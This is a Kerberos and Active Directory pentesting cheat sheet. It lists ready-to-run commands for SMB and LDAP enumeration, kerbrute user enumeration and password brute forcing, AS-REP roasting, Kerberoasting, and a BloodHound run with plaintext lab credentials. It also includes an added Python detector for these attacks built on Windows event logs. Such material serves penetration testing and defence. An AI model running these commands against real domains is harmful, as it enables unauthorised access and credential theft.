88,464 - Pentesting Kerberos

Recon Active Directory (No creds/sessions)


If you have access to an AD environment but no credentials or sessions:

Pentest the network: scan the network, find machines and open ports, and try to exploit vulnerabilities or extract credentials from them. For example, enumerating DNS can reveal key servers in the domain such as web, printers, shares, VPN, media, etc.

gobuster dns -d $DOMAIN -r $IP -t 25 --wildcard -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Check for null and guest access on SMB services (this won't work on modern Windows versions):

enum4linux -a -u "" -p "" $DCIP
enum4linux -a -u "guest" -p "" $DCIP

smbmap -u "" -p "" -P 445 -H $DCIP
smbmap -u "guest" -p "" -P 445 -H $DCIP
smbclient -U '%' -L //$DCIP
smbclient -U 'guest%' -L //$DCIP

Enumerate LDAP

nmap -n -sV --script "ldap* and not brute" -p 389 $DCIP

User enumeration


nmap

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" $IP
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="$DOMAIN",userdb=/root/Desktop/usernames.txt $IP

crackmapexec

crackmapexec smb $DOMAIN -u '' -p '' --users
crackmapexec smb $DOMAIN -u 'guest' -p '' --users

kerbrute - user enumeration

LIST_1='/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt'
LIST_2='/usr/share/wordlists/seclists/Usernames/Names/names.txt'
# DOMAIN='spookysec.local'

/opt/windows/kerbrute userenum --dc $DOMAIN -d $DOMAIN $LIST_1

kerbrute - user bruteforce

USER='administrator'
PASS='/usr/share/wordlists/rockyou.txt'
# DOMAIN='spookysec.local'

/opt/windows/kerbrute bruteuser --dc $DOMAIN -d $DOMAIN $PASS $USER -v

This attack looks for users that do not have the "Kerberos pre-authentication required" attribute set.

/opt/tools/impacket/examples/GetNPUsers.py "$DOMAIN/" -usersfile users.txt -no-pass -dc-ip $IP

Kerberoast - harvest TGS tickets for services

/opt/tools/impacket/examples/GetUserSPNs.py -request -dc-ip $DCIP $DOMAIN/<USERNAME>
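
Detection side of the Kerberos steps above, as an added example (not from the original page or from any of the tools it uses): a filter over Windows Security events 4768, 4771 and 4769 that flags unknown-principal bursts, repeated pre-auth failures, TGTs issued without pre-authentication and RC4 service tickets. The records are constructed, and the field names, thresholds and hosts are assumptions of this example; a production rule would also apply a time window.

```python
from collections import Counter

# Constructed sample records (not real logs), reduced to the fields used below.
# Field names are this example's own; values follow Windows Security events
# 4768 (TGT request), 4769 (service ticket request), 4771 (pre-auth failed).
EVENTS = [
    {"id": 4768, "ip": "10.0.0.50", "user": f"guess{i}", "status": "0x6", "preauth": "-"}
    for i in range(12)
] + [
    {"id": 4771, "ip": "10.0.0.50", "user": "administrator", "status": "0x18"}
    for _ in range(8)
] + [
    {"id": 4768, "ip": "10.0.0.50", "user": "svc-backup", "status": "0x0", "preauth": "0", "etype": "0x17"},
    {"id": 4768, "ip": "10.0.0.21", "user": "alice", "status": "0x0", "preauth": "2", "etype": "0x12"},
    {"id": 4768, "ip": "10.0.0.21", "user": "alcie", "status": "0x6", "preauth": "-"},
    {"id": 4769, "ip": "10.0.0.50", "user": "alice", "service": "svc-sql", "status": "0x0", "etype": "0x17"},
    {"id": 4769, "ip": "10.0.0.21", "user": "alice", "service": "FILESRV$", "status": "0x0", "etype": "0x12"},
]

def detect(events, enum_threshold=10, brute_threshold=5):
    """Return a sorted list of (finding, source_ip, subject) tuples."""
    unknown = Counter()   # source ip -> count of unknown-principal AS-REQs
    badpw = Counter()     # (ip, user) -> count of bad-password pre-auth failures
    findings = set()
    for e in events:
        if e["id"] == 4768 and e["status"] == "0x6":      # KDC_ERR_C_PRINCIPAL_UNKNOWN
            unknown[e["ip"]] += 1
        elif e["id"] == 4771 and e["status"] == "0x18":   # KDC_ERR_PREAUTH_FAILED
            badpw[(e["ip"], e["user"])] += 1
        elif e["id"] == 4768 and e["status"] == "0x0" and e["preauth"] == "0":
            # TGT issued with pre-authentication type 0 (none supplied)
            findings.add(("tgt-without-preauth", e["ip"], e["user"]))
        elif (e["id"] == 4769 and e["status"] == "0x0" and e["etype"] == "0x17"
              and not e["service"].endswith("$")):
            # RC4-HMAC service ticket for a non-machine account
            findings.add(("rc4-service-ticket", e["ip"], e["service"]))
    findings.update(("user-enumeration", ip, str(n))
                    for ip, n in unknown.items() if n >= enum_threshold)
    findings.update(("password-bruteforce", ip, user)
                    for (ip, user), n in badpw.items() if n >= brute_threshold)
    return sorted(findings)

if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(*finding, sep="\t")
```

The single mistyped name from 10.0.0.21 stays below the enumeration threshold, and the AES ticket for the machine account FILESRV$ is ignored.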

With user creds


BloodHound

/opt/windows/BloodHound.py-1.0.1/bloodhound.py -c ALL -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -dc intelligence.htb -ns 10.10.10.248